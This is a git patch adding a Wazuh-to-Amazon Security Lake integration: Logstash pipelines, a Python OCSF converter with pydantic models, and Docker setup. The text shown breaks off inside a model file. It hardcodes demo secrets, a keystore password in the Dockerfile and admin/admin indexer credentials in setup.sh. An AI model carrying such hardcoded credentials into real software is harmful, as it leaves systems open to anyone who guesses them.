From bf4da82e254bb99a60acf9a2451545aa0d4d62a4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Mon, 4 Mar 2024 10:07:47 +0100
Subject: [PATCH] Add Python module to produce OCSF-compliant events (#159)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* Add Python script that receives a continuous JSON stream over stdin and outputs Parquet to Security Lake

* Add Logstash pipeline for the Python script

* Fix encode_parquet() to handle lists of dictionaries

* Correct error in encode_parquet()

* Avoid storing the block ending in the output buffer

* Add comments on handling files and streams with pyarrow for future reference

* Add s3 handling reference links

* Write parquet directly to bucket

* Add the basics of the map_to_ocsf() function

* Minor fixes

* Map alerts to OCSF as they are read

* Add script to convert Wazuh events to OCSF

Also adds a simple test script

* Add OCSF converter + Parquet encoder + test scripts

* Update .gitignore

* Include the contents of the alert under unmapped

* Add support for different OCSF schema versions

* Use custom ocsf module to map alerts

* Modify script to use converter class

* Code polish and fix errors

* Remove unnecessary type declaration from debug flag

* Improve Parquet encoding

* Initial commit for test env's docker-compose.yml

* Remove sudo references from docker-compose.yml

* Add operational Python module to transform events to OCSF

* Create minimal Docker environment to test and develop the integration.

* Fix events-generator's Inventory starvation

* Remove files present in #147

* Cleanup

* Add FQDN hostnames to services for certificates creation

* Add S3 Ninja (Mock) (#165)

* Setup certificates in Wazuh Indexer and Logstash containers (#166)

* Add certificate generator service

* Add certificate config to docker compose file

* Use secrets for certificates

* Disable permission handling inside cert's generator entrypoint.sh

* Back to using a bind mount for certs

* Have entrypoint.sh generate certs with 1000:1000 ownership

* Correct certificate permissions and bind mounting

* Add security initialization variable to compose file

* Fix permissions on certs generator entrypoint

* Add cert generator config file

* Remove old cert generator dir

* Set the indexer hostname correctly in the pipeline file

* Roll back commented code

---------

Signed-off-by: Álex Ruiz <alejandro.ruiz.becerra@wazuh.com>
Co-authored-by: Álex Ruiz <alejandro.ruiz.becerra@wazuh.com>

* Fix Logstash pipelines

* Remove unused file

* Implement OCSF severity normalize function

---------

Signed-off-by: Álex Ruiz <alejandro.ruiz.becerra@wazuh.com>
Co-authored-by: Fede Tux <federico.galland@wazuh.com>
Co-authored-by: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com>
---
 integrations/.gitignore                       |   6 +
 integrations/README.md                        |  37 ++++
 .../amazon-security-lake/.dockerignore        | 180 ++++++++++++++++++
 integrations/amazon-security-lake/.gitignore  | 179 +++++++++++++++++
 integrations/amazon-security-lake/Dockerfile  |  41 ++++
 integrations/amazon-security-lake/README.md   |  15 +-
 .../logstash/pipeline/indexer-to-file.conf    |  28 +++
 .../pipeline/indexer-to-integrator.conf       |  30 +++
 .../pipeline/indexer-to-s3.conf}              |  11 +-
 .../amazon-security-lake/logstash/setup.sh    |  10 +
 .../amazon-security-lake/parquet/parquet.py   |  20 ++
 .../amazon-security-lake/parquet/test.py      |  10 +
 .../amazon-security-lake/requirements.txt     |   3 +
 integrations/amazon-security-lake/run.py      |  26 +++
 .../transform/__init__.py                     |   1 +
 .../transform/converter.py                    |  98 ++++++++++
 .../transform/models/__init__.py              |   2 +
 .../transform/models/ocsf.py                  |  66 +++++++
 .../transform/models/wazuh.py                 |  50 +++++
 .../wazuh-event.sample.json                   |  76 ++++++++
 integrations/docker/amazon-security-lake.yml  | 115 +++++++++++
 integrations/docker/config/certs.yml          |  16 ++
 .../tools/events-generator/.dockerignore      |   2 +
 .../tools/events-generator/Dockerfile         |   4 +
 integrations/tools/events-generator/README.md |  11 ++
 integrations/tools/events-generator/run.py    |  19 +-
 26 files changed, 1044 insertions(+), 12 deletions(-)
 create mode 100644 integrations/.gitignore
 create mode 100644 integrations/README.md
 create mode 100644 integrations/amazon-security-lake/.dockerignore
 create mode 100644 integrations/amazon-security-lake/.gitignore
 create mode 100644 integrations/amazon-security-lake/Dockerfile
 create mode 100644 integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
 create mode 100644 integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
 rename integrations/amazon-security-lake/{wazuh-s3.conf => logstash/pipeline/indexer-to-s3.conf} (78%)
 create mode 100644 integrations/amazon-security-lake/logstash/setup.sh
 create mode 100644 integrations/amazon-security-lake/parquet/parquet.py
 create mode 100644 integrations/amazon-security-lake/parquet/test.py
 create mode 100644 integrations/amazon-security-lake/requirements.txt
 create mode 100644 integrations/amazon-security-lake/run.py
 create mode 100644 integrations/amazon-security-lake/transform/__init__.py
 create mode 100644 integrations/amazon-security-lake/transform/converter.py
 create mode 100644 integrations/amazon-security-lake/transform/models/__init__.py
 create mode 100644 integrations/amazon-security-lake/transform/models/ocsf.py
 create mode 100644 integrations/amazon-security-lake/transform/models/wazuh.py
 create mode 100644 integrations/amazon-security-lake/wazuh-event.sample.json
 create mode 100644 integrations/docker/amazon-security-lake.yml
 create mode 100644 integrations/docker/config/certs.yml
 create mode 100644 integrations/tools/events-generator/.dockerignore
 create mode 100644 integrations/tools/events-generator/Dockerfile

diff --git a/integrations/.gitignore b/integrations/.gitignore
new file mode 100644
index 0000000000000..ee1a01f52633d
--- /dev/null
+++ b/integrations/.gitignore
@@ -0,0 +1,6 @@
+elastic
+opensearch
+splunk
+common
+config
+docker/certs
\ No newline at end of file
diff --git a/integrations/README.md b/integrations/README.md
new file mode 100644
index 0000000000000..ae3253b8547b8
--- /dev/null
+++ b/integrations/README.md
@@ -0,0 +1,37 @@
+## Wazuh indexer integrations
+
+This folder contains integrations with third-party XDR, SIEM and cybersecurity software.
+The goal is to transport Wazuh's analysis results to the platform that best suits your needs.
+
+### Amazon Security Lake
+
+Amazon Security Lake automatically centralizes security data from AWS environments, SaaS providers, 
+on premises, and cloud sources into a purpose-built data lake stored in your account. With Security Lake, 
+you can get a more complete understanding of your security data across your entire organization. You can 
+also improve the protection of your workloads, applications, and data. Security Lake has adopted the 
+Open Cybersecurity Schema Framework (OCSF), an open standard. With OCSF support, the service normalizes 
+and combines security data from AWS and a broad range of enterprise security data sources.
+
+#### Usage
+
+A demo of the integration can be started using the content of this folder and Docker.
+
+```console
+docker compose -f ./docker/amazon-security-lake.yml up -d
+```
+
+This Docker Compose project brings up a *wazuh-indexer* node, a *wazuh-dashboard* node,
+a *logstash* node and our events generator. The events generator continuously pushes events
+to the indexer, while Logstash periodically queries the indexer for new data and delivers
+it to the integration Python program, also present on that node. Finally, the integration
+module prepares and sends the data to the Amazon Security Lake S3 bucket.
+<!-- TODO continue with S3 credentials setup -->
+
+For production usage, follow the instructions on our documentation page about this matter.
+(_when-its-done_)
+
+Finally, note that we also use this Docker environment for development.
+
+### Other integrations
+
+TBD
diff --git a/integrations/amazon-security-lake/.dockerignore b/integrations/amazon-security-lake/.dockerignore
new file mode 100644
index 0000000000000..891ff7a135014
--- /dev/null
+++ b/integrations/amazon-security-lake/.dockerignore
@@ -0,0 +1,180 @@
+wazuh-event.ocsf.json
+*.parquet
+Dockerfile
+
+# Created by https://www.toptal.com/developers/gitignore/api/python
+# Edit at https://www.toptal.com/developers/gitignore?templates=python
+
+### Python ###
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+wheels/
+share/python-wheels/
+*.egg-info/
+.installed.cfg
+*.egg
+MANIFEST
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.nox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*.cover
+*.py,cover
+.hypothesis/
+.pytest_cache/
+cover/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+db.sqlite3
+db.sqlite3-journal
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+.pybuilder/
+target/
+
+# Jupyter Notebook
+.ipynb_checkpoints
+
+# IPython
+profile_default/
+ipython_config.py
+
+# pyenv
+#   For a library or package, you might want to ignore these files since the code is
+#   intended to run in multiple environments; otherwise, check them in:
+# .python-version
+
+# pipenv
+#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
+#   However, in case of collaboration, if having platform-specific dependencies or dependencies
+#   having no cross-platform support, pipenv may install dependencies that don't work, or not
+#   install all needed dependencies.
+#Pipfile.lock
+
+# poetry
+#   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
+#   This is especially recommended for binary packages to ensure reproducibility, and is more
+#   commonly ignored for libraries.
+#   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
+#poetry.lock
+
+# pdm
+#   Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
+#pdm.lock
+#   pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
+#   in version control.
+#   https://pdm.fming.dev/#use-with-ide
+.pdm.toml
+
+# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
+__pypackages__/
+
+# Celery stuff
+celerybeat-schedule
+celerybeat.pid
+
+# SageMath parsed files
+*.sage.py
+
+# Environments
+.env
+.venv
+env/
+venv/
+ENV/
+env.bak/
+venv.bak/
+
+# Spyder project settings
+.spyderproject
+.spyproject
+
+# Rope project settings
+.ropeproject
+
+# mkdocs documentation
+/site
+
+# mypy
+.mypy_cache/
+.dmypy.json
+dmypy.json
+
+# Pyre type checker
+.pyre/
+
+# pytype static type analyzer
+.pytype/
+
+# Cython debug symbols
+cython_debug/
+
+# PyCharm
+#  JetBrains specific template is maintained in a separate JetBrains.gitignore that can
+#  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
+#  and can be added to the global gitignore or merged into this file.  For a more nuclear
+#  option (not recommended) you can uncomment the following to ignore the entire idea folder.
+#.idea/
+
+### Python Patch ###
+# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration
+poetry.toml
+
+# ruff
+.ruff_cache/
+
+# LSP config files
+pyrightconfig.json
+
+# End of https://www.toptal.com/developers/gitignore/api/python
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore
new file mode 100644
index 0000000000000..0740f723d0c79
--- /dev/null
+++ b/integrations/amazon-security-lake/.gitignore
@@ -0,0 +1,179 @@
+wazuh-event.ocsf.json
+*.parquet
+
+# Created by https://www.toptal.com/developers/gitignore/api/python
+# Edit at https://www.toptal.com/developers/gitignore?templates=python
+
+### Python ###
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+wheels/
+share/python-wheels/
+*.egg-info/
+.installed.cfg
+*.egg
+MANIFEST
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.nox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*.cover
+*.py,cover
+.hypothesis/
+.pytest_cache/
+cover/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+db.sqlite3
+db.sqlite3-journal
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+.pybuilder/
+target/
+
+# Jupyter Notebook
+.ipynb_checkpoints
+
+# IPython
+profile_default/
+ipython_config.py
+
+# pyenv
+#   For a library or package, you might want to ignore these files since the code is
+#   intended to run in multiple environments; otherwise, check them in:
+# .python-version
+
+# pipenv
+#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
+#   However, in case of collaboration, if having platform-specific dependencies or dependencies
+#   having no cross-platform support, pipenv may install dependencies that don't work, or not
+#   install all needed dependencies.
+#Pipfile.lock
+
+# poetry
+#   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
+#   This is especially recommended for binary packages to ensure reproducibility, and is more
+#   commonly ignored for libraries.
+#   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
+#poetry.lock
+
+# pdm
+#   Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
+#pdm.lock
+#   pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
+#   in version control.
+#   https://pdm.fming.dev/#use-with-ide
+.pdm.toml
+
+# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
+__pypackages__/
+
+# Celery stuff
+celerybeat-schedule
+celerybeat.pid
+
+# SageMath parsed files
+*.sage.py
+
+# Environments
+.env
+.venv
+env/
+venv/
+ENV/
+env.bak/
+venv.bak/
+
+# Spyder project settings
+.spyderproject
+.spyproject
+
+# Rope project settings
+.ropeproject
+
+# mkdocs documentation
+/site
+
+# mypy
+.mypy_cache/
+.dmypy.json
+dmypy.json
+
+# Pyre type checker
+.pyre/
+
+# pytype static type analyzer
+.pytype/
+
+# Cython debug symbols
+cython_debug/
+
+# PyCharm
+#  JetBrains specific template is maintained in a separate JetBrains.gitignore that can
+#  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
+#  and can be added to the global gitignore or merged into this file.  For a more nuclear
+#  option (not recommended) you can uncomment the following to ignore the entire idea folder.
+#.idea/
+
+### Python Patch ###
+# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration
+poetry.toml
+
+# ruff
+.ruff_cache/
+
+# LSP config files
+pyrightconfig.json
+
+# End of https://www.toptal.com/developers/gitignore/api/python
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/Dockerfile b/integrations/amazon-security-lake/Dockerfile
new file mode 100644
index 0000000000000..a2eec0f8d6075
--- /dev/null
+++ b/integrations/amazon-security-lake/Dockerfile
@@ -0,0 +1,41 @@
+# MULTI-STAGE build
+
+FROM python:3.9 as builder
+# Create a virtualenv for dependencies. This isolates these packages from
+# system-level packages.
+RUN python3 -m venv /env
+# Setting these environment variables is the same as running
+# source /env/bin/activate.
+ENV VIRTUAL_ENV /env
+ENV PATH /env/bin:$PATH
+# Copy the application's requirements.txt and run pip to install all
+# dependencies into the virtualenv.
+COPY requirements.txt /app/requirements.txt
+RUN pip install -r /app/requirements.txt
+
+
+FROM python:3.9
+ENV LOGSTASH_KEYSTORE_PASS="SecretPassword"
+# Add the application source code.
+COPY --chown=logstash:logstash . /home/app
+# Add execution permissions.
+RUN chmod a+x /home/app/run.py
+# Copy the application's dependencies.
+COPY --from=builder /env /env
+
+# Install Logstash
+RUN apt-get update && apt-get install -y iputils-ping wget gpg apt-transport-https
+RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \
+    echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \
+    apt-get update && apt install -y logstash
+# Install logstash-input-opensearch plugin.
+RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
+# Copy Logstash's ingestion pipelines.
+COPY --chown=logstash:logstash logstash/pipeline /usr/share/logstash/pipeline
+# Grant logstash ownership over its files
+RUN chown --recursive logstash:logstash /usr/share/logstash /etc/logstash /var/log/logstash /var/lib/logstash
+
+USER logstash
+# Copy and run the setup.sh script to create and configure a keystore for Logstash.
+COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh
+RUN bash /usr/share/logstash/bin/setup.sh
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/README.md b/integrations/amazon-security-lake/README.md
index 46eee1b92a4b0..1dbe1dd4ebb23 100644
--- a/integrations/amazon-security-lake/README.md
+++ b/integrations/amazon-security-lake/README.md
@@ -46,4 +46,17 @@ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-s3.conf -
 # Start Logstash
 sudo systemctl enable logstash
 sudo systemctl start logstash
-```
\ No newline at end of file
+```
+
+
+### Building the Docker image
+
+```console
+docker build -t wazuh/indexer-security-lake-integration:latest . --progress=plain
+```
+
+
+Run with: 
+```console
+docker run -it --name=wazuh-indexer-security-lake-integration --rm wazuh/indexer-security-lake-integration ls
+```
diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
new file mode 100644
index 0000000000000..4d5a47169e197
--- /dev/null
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
@@ -0,0 +1,28 @@
+input {
+   opensearch {
+      hosts =>  ["wazuh.indexer:9200"]
+      user  =>  "${INDEXER_USERNAME}"
+      password  =>  "${INDEXER_PASSWORD}"
+      ssl => true
+      ca_file => "/usr/share/logstash/root-ca.pem"
+      index =>  "wazuh-alerts-4.x-*"
+      query =>  '{
+            "query": {
+               "range": {
+                  "@timestamp": {
+                     "gt": "now-1m"
+                  }
+               }
+            }
+      }'
+      target => "_source"
+      schedule => "* * * * *"
+   }
+}
+
+
+output {
+   file {
+      path => "/usr/share/logstash/pipeline/indexer-to-file.json"
+   }
+}
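
For reference, the scheduled query above pulls the last minute of alerts once per minute. A rough Python equivalent of that request, as a sketch only (it assumes the `requests` package and the demo `admin:admin` credentials stored by logstash/setup.sh):

```python
# Sketch: the range query the pipeline above schedules every minute.
import requests

query = {"query": {"range": {"@timestamp": {"gt": "now-1m"}}}}
response = requests.post(
    "https://wazuh.indexer:9200/wazuh-alerts-4.x-*/_search",
    json=query,
    auth=("admin", "admin"),  # demo credentials (see logstash/setup.sh)
    verify="/usr/share/logstash/root-ca.pem",
)
for hit in response.json()["hits"]["hits"]:
    print(hit["_source"])
```
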
diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
new file mode 100644
index 0000000000000..81a4bdad5883a
--- /dev/null
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
@@ -0,0 +1,30 @@
+input {
+   opensearch {
+      hosts =>  ["wazuh.indexer:9200"]
+      user  =>  "${INDEXER_USERNAME}"
+      password  =>  "${INDEXER_PASSWORD}"
+      ssl => true
+      ca_file => "/usr/share/logstash/root-ca.pem"
+      index =>  "wazuh-alerts-4.x-*"
+      query =>  '{
+            "query": {
+               "range": {
+                  "@timestamp": {
+                     "gt": "now-1m"
+                  }
+               }
+            }
+      }'
+      target => "_source"
+      schedule => "* * * * *"
+   }
+}
+
+output {
+    pipe {
+        id => "securityLake"
+        message_format => "%{_source}"
+        ttl => "10"
+        command => "/usr/bin/env python3 /usr/local/bin/run.py -d"
+    }
+}
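
The `pipe` output above feeds one JSON event (`%{_source}`) per line to the command's stdin. The run.py committed here only ships a `_test()` routine, so the following is a hypothetical sketch of the consuming loop the commit history describes ("receives a continuous JSON stream over stdin"):

```python
# Hypothetical stdin loop for the pipe output above: one JSON event per line.
import json
import sys

import transform

for line in sys.stdin:
    line = line.strip()
    if not line:
        continue
    event = transform.converter.from_json(json.loads(line))
    print(transform.converter.to_detection_finding(event))
```
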
diff --git a/integrations/amazon-security-lake/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
similarity index 78%
rename from integrations/amazon-security-lake/wazuh-s3.conf
rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
index 108423afd3193..22d44b9d0d3f5 100644
--- a/integrations/amazon-security-lake/wazuh-s3.conf
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
@@ -1,11 +1,11 @@
 input {
    opensearch {
-      hosts =>  ["localhost:9200"]
-      user  =>  "${WAZUH_INDEXER_USERNAME}"
-      password  =>  "${WAZUH_INDEXER_PASSWORD}"
-      index =>  "wazuh-alerts-4.x-*"
+      hosts =>  ["wazuh.indexer:9200"]
+      user  =>  "${INDEXER_USERNAME}"
+      password  =>  "${INDEXER_PASSWORD}"
       ssl => true
-      ca_file => "/etc/logstash/wi-certs/root-ca.pem"
+      ca_file => "/usr/share/logstash/root-ca.pem"
+      index =>  "wazuh-alerts-4.x-*"
       query =>  '{
             "query": {
                "range": {
@@ -15,6 +15,7 @@ input {
                }
             }
       }'
+      target => "_source"
       schedule => "* * * * *"
    }
 }
diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh
new file mode 100644
index 0000000000000..9527f1fa58362
--- /dev/null
+++ b/integrations/amazon-security-lake/logstash/setup.sh
@@ -0,0 +1,10 @@
+#!/usr/bin/bash
+
+# This script creates and configures a keystore for Logstash to store
+# the indexer's credentials. NOTE: this works only for a dockerized Logstash.
+#   Source: https://www.elastic.co/guide/en/logstash/current/keystore.html
+
+# Create keystore
+/usr/share/logstash/bin/logstash-keystore create --path.settings /etc/logstash
+echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME --path.settings /etc/logstash
+echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD --path.settings /etc/logstash
diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py
new file mode 100644
index 0000000000000..79a146f0993a2
--- /dev/null
+++ b/integrations/amazon-security-lake/parquet/parquet.py
@@ -0,0 +1,20 @@
+
+import pyarrow as pa
+import pyarrow.parquet as pq
+import pyarrow.fs as pafs
+
+
+class Parquet:
+
+    @staticmethod
+    def encode(data: dict):
+        return pa.Table.from_pydict(data)
+
+    @staticmethod
+    def to_s3(data: pa.Table, s3: pafs.S3FileSystem):
+        pass
+
+    @staticmethod
+    def to_file(data: pa.Table, path: str):
+        # pq.write_to_dataset(table=data, root_path=path)
+        pq.write_table(data, path)
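
`Parquet.to_s3()` is committed as a stub. One possible completion using pyarrow's S3 filesystem, as a sketch (the bucket path and region are placeholders):

```python
# Hypothetical completion of the to_s3() stub, using pyarrow's S3 filesystem.
import pyarrow as pa
import pyarrow.parquet as pq
import pyarrow.fs as pafs

def to_s3(data: pa.Table, path: str, region: str = "us-east-1"):
    # "path" is a bucket prefix such as "my-bucket/wazuh" (placeholder).
    s3 = pafs.S3FileSystem(region=region)
    pq.write_to_dataset(table=data, root_path=path, filesystem=s3)
```
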
diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py
new file mode 100644
index 0000000000000..318da6ebe4740
--- /dev/null
+++ b/integrations/amazon-security-lake/parquet/test.py
@@ -0,0 +1,10 @@
+#!/usr/bin/python
+
+import pyarrow as pa
+from parquet import Parquet
+import json
+
+with open("wazuh-event.ocsf.json", "r") as fd:
+    events = [json.load(fd)]
+    table = pa.Table.from_pylist(events)
+    Parquet.to_file(table, "output/wazuh-event.ocsf.parquet")
diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt
new file mode 100644
index 0000000000000..8ebe50a4ef264
--- /dev/null
+++ b/integrations/amazon-security-lake/requirements.txt
@@ -0,0 +1,3 @@
+pyarrow>=10.0.1
+parquet-tools>=0.2.15
+pydantic==2.6.1
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py
new file mode 100644
index 0000000000000..c26adffa2ea0f
--- /dev/null
+++ b/integrations/amazon-security-lake/run.py
@@ -0,0 +1,26 @@
+#!/env/bin/python3.9
+
+import transform
+import json
+
+
+def _test():
+    ocsf_event = {}
+    with open("./wazuh-event.sample.json", "r") as fd:
+        # Load from file descriptor
+        raw_event = json.load(fd)
+        try:
+            event = transform.converter.from_json(raw_event)
+            print(event)
+            ocsf_event = transform.converter.to_detection_finding(event)
+            print("")
+            print("--")
+            print("")
+            print(ocsf_event)
+
+        except KeyError as e:
+            raise e
+
+
+if __name__ == '__main__':
+    _test()
diff --git a/integrations/amazon-security-lake/transform/__init__.py b/integrations/amazon-security-lake/transform/__init__.py
new file mode 100644
index 0000000000000..6e8733a32b85d
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/__init__.py
@@ -0,0 +1 @@
+import transform.converter
diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py
new file mode 100644
index 0000000000000..90f8eeef27bac
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/converter.py
@@ -0,0 +1,98 @@
+import json
+
+import pydantic
+import transform.models as models
+
+
+def normalize(level: int) -> int:
+    """
+    Maps the Wazuh rule level to an OCSF severity_id in the 0-5 range.
+    """
+    if level >= 15:     # (5) Critical
+        severity = 5
+    elif level >= 11:   # (4) High
+        severity = 4
+    elif level >= 8:    # (3) Medium
+        severity = 3
+    elif level >= 4:    # (2) Low
+        severity = 2
+    elif level >= 0:    # (1) Informational
+        severity = 1
+    else:
+        severity = 0    # (0) Unknown
+
+    return severity
+
+
+def join(iterable, separator=","):
+    return separator.join(iterable)
+
+
+def to_detection_finding(event: models.wazuh.Event) -> models.ocsf.DetectionFinding:
+    finding_info = models.ocsf.FindingInfo(
+        analytic=models.ocsf.AnalyticInfo(
+            category=", ".join(event.rule.groups),
+            name=event.decoder.name,
+            type_id=1,
+            uid=event.rule.id
+        ),
+        attacks=models.ocsf.AttackInfo(
+            tactic=models.ocsf.TechniqueInfo(
+                name=", ".join(event.rule.mitre.tactic),
+                uid=", ".join(event.rule.mitre.id)
+            ),
+            technique=models.ocsf.TechniqueInfo(
+                name=", ".join(event.rule.mitre.technique),
+                uid=", ".join(event.rule.mitre.id)
+            ),
+            version="v13.1"
+        ),
+        title=event.rule.description,
+        types=[event.input.type],
+        uid=event.id
+    )
+
+    metadata = models.ocsf.Metadata(
+        log_name="Security events",
+        log_provider="Wazuh",
+        product=models.ocsf.ProductInfo(
+            name="Wazuh",
+            lang="en",
+            vendor_name="Wazuh, Inc."
+        ),
+        version="1.1.0"
+    )
+
+    resources = [models.ocsf.Resource(
+        name=event.agent.name, uid=event.agent.id)]
+
+    severity_id = normalize(event.rule.level)
+
+    unmapped = {
+        "data_sources": [
+            event.location,
+            event.manager.name
+        ],
+        "nist": event.rule.nist_800_53  # Array
+    }
+
+    return models.ocsf.DetectionFinding(
+        count=event.rule.firedtimes,
+        message=event.rule.description,
+        finding_info=finding_info,
+        metadata=metadata,
+        raw_data=event.full_log,
+        resources=resources,
+        risk_score=event.rule.level,
+        severity_id=severity_id,
+        time=event.timestamp,
+        unmapped=unmapped
+    )
+
+
+def from_json(event: dict) -> models.wazuh.Event:
+    # model_validate_json() needs a string, bytes or bytearray, hence the dumps().
+    try:
+        return models.wazuh.Event.model_validate_json(json.dumps(event))
+    except pydantic.ValidationError as e:
+        print(e)
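
For reference, the boundary values of the `normalize()` mapping above:

```python
# Boundary values of the level -> severity_id mapping in normalize().
from transform.converter import normalize

assert normalize(15) == 5  # Critical
assert normalize(11) == 4  # High
assert normalize(8) == 3   # Medium
assert normalize(4) == 2   # Low
assert normalize(0) == 1   # Informational
assert normalize(-1) == 0  # Unknown
```
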
diff --git a/integrations/amazon-security-lake/transform/models/__init__.py b/integrations/amazon-security-lake/transform/models/__init__.py
new file mode 100644
index 0000000000000..2fdec7bc648af
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/models/__init__.py
@@ -0,0 +1,2 @@
+import transform.models.wazuh
+import transform.models.ocsf
diff --git a/integrations/amazon-security-lake/transform/models/ocsf.py b/integrations/amazon-security-lake/transform/models/ocsf.py
new file mode 100644
index 0000000000000..4918b6e29081c
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/models/ocsf.py
@@ -0,0 +1,66 @@
+import pydantic
+import typing
+
+
+class AnalyticInfo(pydantic.BaseModel):
+    category: str
+    name: str
+    type_id: int
+    uid: str
+
+
+class TechniqueInfo(pydantic.BaseModel):
+    name: str
+    uid: str
+
+
+class AttackInfo(pydantic.BaseModel):
+    tactic: TechniqueInfo
+    technique: TechniqueInfo
+    version: str
+
+
+class FindingInfo(pydantic.BaseModel):
+    analytic: AnalyticInfo
+    attacks: AttackInfo
+    title: str
+    types: typing.List[str]
+    uid: str
+
+
+class ProductInfo(pydantic.BaseModel):
+    name: str
+    lang: str
+    vendor_name: str
+
+
+class Metadata(pydantic.BaseModel):
+    log_name: str
+    log_provider: str
+    product: ProductInfo
+    version: str
+
+
+class Resource(pydantic.BaseModel):
+    name: str
+    uid: str
+
+
+class DetectionFinding(pydantic.BaseModel):
+    activity_id: int = 1
+    category_name: str = "Findings"
+    category_uid: int = 2
+    class_name: str = "Detection Finding"
+    class_uid: int = 2004
+    count: int
+    message: str
+    finding_info: FindingInfo
+    metadata: Metadata
+    raw_data: str
+    resources: typing.List[Resource]
+    risk_score: int
+    severity_id: int
+    status_id: int = 99
+    time: str
+    type_uid: int = 200401
+    unmapped: typing.Dict[str, typing.List[str]]
diff --git a/integrations/amazon-security-lake/transform/models/wazuh.py b/integrations/amazon-security-lake/transform/models/wazuh.py
new file mode 100644
index 0000000000000..34aa3c91e96e1
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/models/wazuh.py
@@ -0,0 +1,50 @@
+import pydantic
+import typing
+
+# =========== Wazuh event models =========== #
+# These are only the fields required for the integration.
+
+
+class Mitre(pydantic.BaseModel):
